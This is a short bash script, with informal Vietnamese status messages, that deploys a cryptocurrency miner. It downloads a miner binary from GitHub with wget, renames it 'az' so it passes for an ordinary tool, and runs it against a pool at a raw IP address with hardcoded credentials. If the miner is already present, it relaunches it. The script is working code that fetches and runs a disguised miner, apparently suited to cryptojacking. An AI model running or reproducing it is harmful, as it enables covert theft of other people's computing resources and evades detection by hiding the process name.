#! /bin/bash

if [ -f ${PWD}/az ]; then
    if pgrep -x "az" > /dev/null
then
    echo "Miner dang chay roi , ke cmn di "
    
else

echo "Miner da install , chay thoi "
./az -o 38.130.192.192:80 -u lovelyn -p tengicungduoc1234 --no-longpoll
    
fi
exit
fi

wget https://github.com/biblepay/cpuminer/raw/master/binaries/bbpminer_linux
chmod +x bbpminer_linux
mv bbpminer_linux az
./az -o 38.130.192.192:80 -u lovelyn -p tengicungduoc1234 --no-longpoll
